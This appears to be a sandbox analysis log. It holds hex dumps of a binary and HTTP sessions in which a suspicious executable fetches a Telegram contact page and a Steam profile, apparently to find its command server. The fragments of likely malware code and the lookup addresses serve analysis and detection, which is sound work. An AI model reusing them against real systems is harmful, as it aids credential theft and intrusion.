                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 09 32 51 1b 88 50 09 0f b6 51 0a 32 51 1c 88 50 0a 0f b6 51 0b 32 51 1d 88 50 0b 0f b6 51 0c 32 51 1e 88 50 0c 0f b6 51 0d 32 51 1f 88 50 0d c6 05 b3 c1 66 00 01 c3 cc cc cc cc cc cc cc cc cc 80 3d bc c1 66 00 00 75 5d 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 14 88 10 0f b6 51 01 32 51 15 88 50 01 0f b6 51 02 32 51 16 88 50 02 0f b6 51 03 32 51 17 88 50 03 0f b6 51 04 32 51 18 88 50 04 0f b6 51 05 32 51 19 88 50 05 0f b6 51 06 32 51 1a 88 50 06 0f b6 51 07 32 51 1b 88 50 07 c6 05 bc c1 66 00 01 c3 cc cc cc cc cc cc cc cc cc 80 3d d6 c1 66 00 00 75 54 55 53 57 56 8b 74 24 18 8b 7c 24 14 31 c9 bb e7 ff ff ff bd cd cc cc cc 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 89 c8 41 f7 e5 c1 ea 02 83 e2 fc 8d 04 92 8d 14 1e 29 c2 0f b6 42 19 32 44 1e 2d 88 44 1f 19
                                                                                                                                                                                                                        Data Ascii: 2QPQ2QPQ2QPQ2QPQ2QPf=fu]L$D$2QQ2QPQ2QPQ2QPQ2QPQ2QPQ2QPQ2QPf=fuTUSWVt$|$1f.DA)B2D-D
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 45 00 0f 93 c2 03 b4 d5 78 9f 18 c3 43 ff e6 ba 67 66 66 66 89 c8 f7 ea 89 d0 c1 e8 1f c1 fa 02 01 c2 83 c1 09 31 c0 83 f9 13 0f 93 c0 be 93 f7 48 49 03 b4 c5 78 9f 18 c3 43 89 d1 ff e6 b9 cd cc cc cc 89 f8 f7 e1 89 d6 c6 43 01 00 c1 ee 03 8d 04 36 8d 04 80 89 fa 29 c2 8a 04 14 88 03 83 ff 0a bf 04 00 00 00 b8 10 00 00 00 0f 42 c7 8b 15 28 fa 45 00 bd 93 f7 48 49 8b 84 02 78 9f 18 c3 01 e8 4b ff e0 89 f0 b9 cd cc cc cc f7 e1 c1 ea 03 8d 04 12 8d 04 80 89 f1 29 c1 8a 04 0c 88 03 83 fe 0a b8 10 00 00 00 0f 42 c7 8b 0d 28 fa 45 00 8b 84 01 78 9f 18 c3 01 e8 4b 89 d6 ff e0 8b 44 24 24 83 c4 0c 5e 5f 5b 5d c2 08 00 b9 67 66 66 66 89 f8 f7 e9 89 d1 89 d0 c1 e8 1f c1 f9 02 01 c1 8d 47 09 31 d2 83 f8 13 0f 93 c2 03 b4 d5 78 9f 18 c3 4b 43 ff e6 cc cc cc cc cc cc
                                                                                                                                                                                                                        Data Ascii: ExCgfff1HIxCC6)B(EHIxK)B(ExKD$$^_[]gfffG1xKC
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 15 04 fe 45 00 01 fa 89 d9 ff b0 c3 24 a2 ef 56 ff d2 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 24 fe 45 00 01 f8 b9 7c 2d a2 ef 03 0d c4 04 46 00 ba bc ca 66 00 51 52 ff d0 83 c4 08 a1 04 fe 45 00 01 f8 89 d9 ba bc ca 66 00 52 56 ff d0 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 04 fe 45 00 01 f8 89 d9 ba 6e ca 66 00 52 56 ff d0 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 f4 fd 45 00 01 f8 89 d9 8d 95 8c 00 00 00 52 56 ff d0 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 08 05 46 00 8b b0 c3 24 a2 ef a1 ec fd 45 00 01 f8 89 d9 ff d0 50 ff d6 89 45 f0 a1 08 05 46 00 8b b0 c3 24 a2 ef a1 ec fd 45 00 01 f8 8d 4d d8 ff d0 50 ff d6 89 c3 03 5d f0 a1
                                                                                                                                                                                                                        Data Ascii: E$VEVE$E|-FfQREfRVEVEEnfRVEVEERVEVEF$EPEF$EMP]
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 00 83 c4 0c a1 cc 29 46 00 8b 80 b8 98 be 0e 89 45 e0 a1 54 11 46 00 01 f8 8d 5d 8c 6a 1c 53 ff d0 a1 58 11 46 00 01 f8 89 d9 ff d0 89 c6 a1 5c 11 46 00 01 f8 b9 e5 a3 be 0e 03 0d b4 29 46 00 ba 6b cc 67 00 51 52 ff d0 83 c4 08 a1 60 11 46 00 01 f8 56 b9 6b cc 67 00 51 8d 8d 88 fe ff ff 51 ff d0 50 8d 85 84 fd ff ff 50 ff 55 e0 a1 64 11 46 00 01 f8 89 d9 ff d0 0f 57 c0 0f 11 43 04 0f 11 43 34 0f 11 43 24 0f 11 43 14 c7 03 44 00 00 00 8d 85 80 fc ff ff 89 43 08 8d 75 d0 0f 11 06 a1 68 11 46 00 01 f8 8d 4d 08 ff 71 74 ff d0 a1 d4 29 46 00 83 ec 28 89 74 24 24 89 5c 24 20 31 c9 89 4c 24 1c 89 4c 24 18 0f 28 05 d0 54 45 00 0f 11 44 24 08 8d 95 84 fd ff ff 89 54 24 04 89 0c 24 31 f6 ff 90 b8 98 be 0e 85 c0 b8 0c 00 00 00 0f 45 c6 8b 0d c0 29 46 00 ba 47 56 31
                                                                                                                                                                                                                        Data Ascii: )FETF]jSXF\F)FkgQR`FVkgQQPPUdFWCC4C$CDCuhFMqt)F(t$$\$ 1L$L$(TED$T$$1E)FGV1
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 2c 46 00 ba 19 7f 99 fa 01 d1 51 bf 4c cc 67 00 57 ff d0 83 c4 08 a1 80 2c 46 00 8b 80 da 74 99 fa 01 d8 8d 8d 88 00 00 00 57 8d 5d cc 53 ff d0 a1 80 2c 46 00 8b 80 d2 74 99 fa b9 2a 21 49 d1 01 c8 89 d9 8d 55 70 52 8d 5d a8 53 ff d0 a1 80 2c 46 00 8b 80 16 75 99 fa b9 2a 21 49 d1 01 c8 8b 0d 88 2c 46 00 ba ba 83 99 fa 01 d1 51 bf fd cc 67 00 57 ff d0 83 c4 08 a1 80 2c 46 00 8b 80 da 74 99 fa b9 2a 21 49 d1 01 c8 89 d9 57 ff 75 ec ff d0 8d 4e 04 a1 80 2c 46 00 8b 80 06 75 99 fa ba 2a 21 49 d1 01 d0 8d 55 08 52 ff d0 8d bd 38 ff ff ff 89 3e 8b 45 e8 89 46 78 8b 45 e4 89 46 7c a1 80 2c 46 00 8b 80 0a 75 99 fa b9 2a 21 49 d1 01 c8 ff d0 8b 65 f0 a1 80 2c 46 00 8b 80 e2 74 99 fa b9 2a 21 49 d1 01 c8 89 f9 ff d0 a1 80 2c 46 00 8b 80 e2 74 99 fa b9 2a 21 49 d1
                                                                                                                                                                                                                        Data Ascii: ,FQLgW,FtW]S,Ft*!IUpR]S,Fu*!I,FQgW,Ft*!IWuN,Fu*!IUR8>EFxEF|,Fu*!Ie,Ft*!I,Ft*!I
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 8b 80 fc d0 c5 c2 01 f8 89 d9 ff d0 a1 84 2e 46 00 8b 80 fc d0 c5 c2 01 f8 8d 4d c0 ff d0 a1 98 2e 46 00 8b 0d 84 2e 46 00 03 b9 10 d1 c5 c2 8b b0 e8 d0 c5 c2 b8 ab e4 c5 c2 03 05 8c 2e 46 00 bb 17 ce 67 00 50 53 ff d7 83 c4 08 53 8d 85 70 fe ff ff 50 ff d6 8b 0d 80 2e 46 00 8d 51 28 8d 71 04 85 c0 0f 44 d6 b8 af 00 85 02 03 82 e8 d0 c5 c2 ff e0 a1 84 2e 46 00 bb 8b c4 3c 90 8b 80 e8 d0 c5 c2 01 d8 8d 7d cc 89 f9 68 0c a6 45 00 ff d0 a1 ac 2e 46 00 8b 0d 84 2e 46 00 8b 91 f4 d0 c5 c2 01 da 8d 75 a8 89 f9 ff b0 e8 d0 c5 c2 56 ff d2 8d 45 08 83 c0 18 8b 0d 84 2e 46 00 8b 91 ec d0 c5 c2 01 da 8d 7d 9c 89 f1 50 57 ff d2 a1 84 2e 46 00 8b 80 0c d1 c5 c2 01 d8 b9 03 db c5 c2 03 0d 8c 2e 46 00 51 be 49 cc 67 00 56 ff d0 83 c4 08 a1 84 2e 46 00 8b 80 f4 d0 c5 c2
                                                                                                                                                                                                                        Data Ascii: .FM.F.F.FgPSSpP.FQ(qD.F<}hE.F.FuVE.F}PW.F.FQIgV.F


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.2.849710149.154.167.994436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:52:19 UTC85OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        2024-12-23 07:52:20 UTC510INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:20 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Content-Length: 9538
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323; expires=Tue, 24 Dec 2024 07:52:20 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                        2024-12-23 07:52:20 UTC9538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.2.849711104.102.49.2544436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:52:21 UTC119OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:22 GMT
                                                                                                                                                                                                                        Content-Length: 35590
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: sessionid=a683bfea8aad978e31b0518e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC16384INData Raw: 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                        Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC3768INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f
                                                                                                                                                                                                                        Data Ascii: </div><div class="profile_header_badgeinfo"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamco
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                        Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.2.849714149.154.167.994436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:52:56 UTC143OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
                                                                                                                                                                                                                        2024-12-23 07:52:56 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:56 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Content-Length: 9538
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                        2024-12-23 07:52:56 UTC9538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.2.849715104.102.49.2544436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:52:58 UTC215OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
                                                                                                                                                                                                                        2024-12-23 07:52:59 UTC1733INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:58 GMT
                                                                                                                                                                                                                        Content-Length: 35590
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2024-12-23 07:52:59 UTC14651INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                        2024-12-23 07:52:59 UTC16384INData Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
                                                                                                                                                                                                                        Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
                                                                                                                                                                                                                        2024-12-23 07:52:59 UTC3584INData Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
                                                                                                                                                                                                                        Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
